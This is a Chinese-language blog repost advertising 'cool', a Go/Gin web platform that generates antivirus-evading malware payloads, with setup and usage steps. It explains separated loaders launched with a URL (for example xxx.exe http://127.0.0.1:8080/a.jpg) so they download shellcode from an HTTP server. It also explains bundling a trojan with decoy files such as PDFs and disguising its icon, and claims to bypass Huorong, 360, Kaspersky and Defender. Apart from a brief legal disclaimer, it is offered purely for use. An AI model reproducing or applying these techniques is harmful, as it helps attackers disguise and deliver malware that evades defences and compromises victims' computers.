前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式

Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式

作者头像
天钧
发布2021-12-01 18:41:09
1.4K0
发布2021-12-01 18:41:09
举报
文章被收录于专栏:渗透云笔记

Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式。

cool

时间线:

  • Golang Gin 框架写的免杀平台- (2021.11.12)
  • Golang Gin 框架写的免杀平台,更新捆绑免杀- (2021.11.20)
  • 增加自定义捆绑,修复一个小bug- (2021.11.22)
  • 上传"compile.exe_备份",在\service\executable\下,如果生成免杀是0kb的话就把原来的compile.exe删掉,把"compile.exe_备份"改成compile.exe,这样的话混淆效果会变差。。。但是至少能用了-(2021.11.25)

安装

  1. 安装Go环境,版本要1.17及以上;
  2. 如果是首次安装Go环境,安装完毕后要配置代理,执行以下这两条命令:
  • go env -w GO111MODULE=on
  • go env -w GOPROXY=https://goproxy.io,direct
  1. 完毕后执行 go install mvdan.cc/garble@latest
  2. 下载本项目到D盘根目录,文件夹名字改为cool;
  3. 运行cool.exe;
  4. 访问 http://127.0.0.1:9000

使用

为减去浏览器扫描的时间,故生成的文件格式为txt,使用时只需要把后缀修改为前端提示的后缀就可以了。

1. 加密1

  • 直接执行exe。

2. 加密2

  • 直接执行exe。

3. 分离1(houqing)

  • 用python起一个HTTP服务(python -m http.server 8080),
  • 把图片放到起http服务的目录下,
  • 执行exe 参数为http服务的图片路径(xxx.exe http://127.0.0.1:8080/a.jpg) 。

4. 分离2

上线方式1
  • 用python起一个HTTP服务(python -m http.server 8080),
  • 把图片放到起http服务的目录下,
  • 执行exe 参数为http服务的图片路径(xxx.exe http://127.0.0.1:8080/a.jpg) 。
上线方式2
  • 执行xxx.exe 参数为shellcode.txt里的内容 。

5. 捆绑上线

捆绑内置免杀马
  • 填写信息(免杀方式、listeners或者shellcode等),
  • 上传需要和木马捆绑的文件,
  • 下载完毕后将后缀改为exe,
  • 图标自行修改。
捆绑自定义木马
  • 第一个文件选择木马(木马.exe),第二个文件选择要捆绑的文件(如pdf等)
  • 点击生成

目前火绒、360、卡巴斯基、def全过;先这样用,不能bypass了再说,更新频率看star数量。

声明:仅用于技术交流,请勿用于非法用途。

项目地址:https://github.com/Ed1s0nZ/cool

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-11-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透云笔记 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • cool
    • 安装
      • 使用
        • 1. 加密1
        • 2. 加密2
        • 3. 分离1(houqing)
        • 4. 分离2
        • 5. 捆绑上线
      • 声明:仅用于技术交流,请勿用于非法用途。
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档